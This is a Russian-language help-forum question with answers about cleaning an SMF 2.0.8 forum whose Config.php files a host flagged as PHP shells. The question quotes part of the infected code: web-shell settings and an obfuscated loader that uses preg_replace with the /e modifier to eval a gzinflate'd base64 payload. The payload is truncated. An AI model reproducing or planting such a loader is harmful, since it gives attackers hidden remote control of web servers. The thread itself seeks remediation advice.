# Как лучше устранить последствия заражения вирусом движка форума SMF ?

Tags: php, сервер, forum

На сайте установлен **SMF**, версия 2.0.8 + LangPack

Сегодня от хостера пришло сообщение вида:

> ```
> /forum/public_html/Packages/Config.php:
> PHP.Shell.HostComm.#27047.SCH.0.UNOFFICIAL
> /forum/public_html/Themes/Config/Config.php:
> {HEX}php.cmdshell.cih.225.UNOFFICIAL
> ```

Внутри этих конфигов:

> $auth_pass = "..."; $color = "#df5"; $default_action =
>   "FilesMan"; $default_use_ajax = true; $default_charset =
>   "Windows-1251";
>   preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcumz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+d

Форум работает, всё вроде бы нормально.

Но с вирусами что-то нужно делать:
Config файлы можно удалить бзе вреда для SMF? Они заново будут созданы движком SMF? Как лучше поступить в этом случае?

Answer (score 1):

Если вам нужна надежность - восстанавливайте из заведомо чистой резервной копии. Попытки поиска чего-либо не дают гарантии что вы найдете всю заразу.

Comment: К сожалению такой копии не сохранилось, только если обновлять дистрибутив

Comment: @Enshtein ни один способ автоматизированного поиска не дает и не может дать гарантии что будет найдена вся зараза, увы.

Comment: Понимаю конечно же, буду лечить обновлением файлами из дистрибутива

Comment: @Enshtein, обратите внимание на те файлы, которые не будут заменены файлами из дистрибутива.